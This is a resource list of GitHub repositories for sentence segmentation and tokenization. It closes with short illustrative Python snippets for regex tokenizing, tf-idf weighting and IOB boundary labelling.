100 Best GitHub: Tokenization


See also:

Tokenizer & Dialog Systems


sentence+tokenization [25x Jul 2014]

  • proycon/ucto .. Unicode tokeniser. Ucto tokenizes text files: it separates words from punctuation and splits sentences. It offers several other basic preprocessing steps, such as changing case, all of which you can use to make your text suitable for further processing such as indexing, part-of-speech tagging, or machine…
  • ixa-ehu/ixa-pipe-tok .. IXA pipes sentence segmenter and tokenizer (http://ixa2.si.ehu.es/ixa-pipes).
  • mtancret/pySentencizer .. This Python module is a simple sentencizer, tokenizer, and parts-of-speech tagger for the English language.
  • ticup/tokepi .. Tokenizer that transforms a string of sentences into an array of white-space separated strings of tokens
  • sgrimes/word_aligner .. PyQt GUI to allow for annotation and display of token-based alignments of parallel sentences
  • spatzle/tf-idf_python .. tf-idf library in Python, extended from another Python example, with NLTK added to split the document into sentences and tokenize the words.
  • amb-enthusiast/PersonCoreferenceAnnotator .. A UIMA annotator (including type system) which annotates sentences, tokens, Person named entities, and coreference-resolution “mentions”. It uses OpenNLP coreference and named-entity recognition tools within an Apache UIMA analysis engine.
  • texttheater/iobify .. From the raw version and a normalized version of a text, creates a raw version where sentence and token boundaries are explicitly marked.
  • Gbuomprisco/Simple-Text-Analizer .. A simple text analyzer that manages texts and provides tools such as a tokenizer, sentence splitter, and regex tester, built with Python NLTK and PyGTK.
  • fnl/segtok .. scripts to pre-process plain-text: sentence segmentation, tokenization, and stemming
  • ragerri/stanford-tok-en .. This module provides a ‘ready to use’ KAF wrapper for English sentence segmentation and tokenization using the Stanford PTBTokenizer (http://www-nlp.stanford.edu/software/). All dependencies and classpath configurations are automatically managed by Maven.
  • kuhumcst/rtfreader .. Reads an RTF or flat text file and outputs the text, one line per sentence & optionally tokenized.
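
Most of the repos above follow the same two-step pipeline: split text into sentences, then separate words from punctuation within each sentence. Here is a minimal regex-based sketch of that pipeline (an illustration only, not any listed repo's algorithm; real tools like ucto and segtok handle abbreviations, ellipses, and Unicode far more carefully):

```python
import re

def split_sentences(text):
    # Naive split: sentence-final punctuation, whitespace, then an
    # uppercase letter. Breaks on abbreviations like "Dr." by design.
    return re.split(r'(?<=[.!?])\s+(?=[A-Z])', text.strip())

def tokenize(sentence):
    # Separate words from punctuation, as ucto's description puts it:
    # runs of word characters, or any single non-space symbol.
    return re.findall(r"\w+|[^\w\s]", sentence)

sample = "Ucto tokenizes text. It splits sentences!"
for s in split_sentences(sample):
    print(tokenize(s))
# ['Ucto', 'tokenizes', 'text', '.']
# ['It', 'splits', 'sentences', '!']
```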
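
The spatzle/tf-idf_python entry pairs tokenization with tf-idf weighting. As a reminder of what that computes, here is a stdlib-only sketch over already-tokenized documents, using the standard tf-idf formula rather than that repo's exact code:

```python
import math
from collections import Counter

def tf_idf(docs):
    # docs: list of token lists. Returns one {term: weight} dict per doc.
    # tf = raw count / doc length; idf = log(N / df(term)).
    n = len(docs)
    df = Counter()
    for doc in docs:
        df.update(set(doc))
    weights = []
    for doc in docs:
        counts = Counter(doc)
        weights.append({
            term: (count / len(doc)) * math.log(n / df[term])
            for term, count in counts.items()
        })
    return weights

w = tf_idf([["the", "cat", "sat"], ["the", "dog", "ran"]])
# "the" occurs in every document, so its idf (and weight) is zero,
# while "cat" and "dog" get positive weights.
```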
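
texttheater/iobify marks sentence and token boundaries explicitly in the raw text. One common way to represent such boundaries is character-level IOB labels (B = token begin, I = inside, O = outside); the sketch below is a generic illustration of that scheme, not iobify's actual output format:

```python
def iob_labels(text, tokens):
    # Label each character of `text` as B (first char of a token),
    # I (inside a token), or O (outside any token, e.g. whitespace).
    labels = ["O"] * len(text)
    pos = 0
    for tok in tokens:
        start = text.index(tok, pos)  # next occurrence of the token
        labels[start] = "B"
        for i in range(start + 1, start + len(tok)):
            labels[i] = "I"
        pos = start + len(tok)
    return labels

print(iob_labels("a cat", ["a", "cat"]))
# ['B', 'O', 'B', 'I', 'I']
```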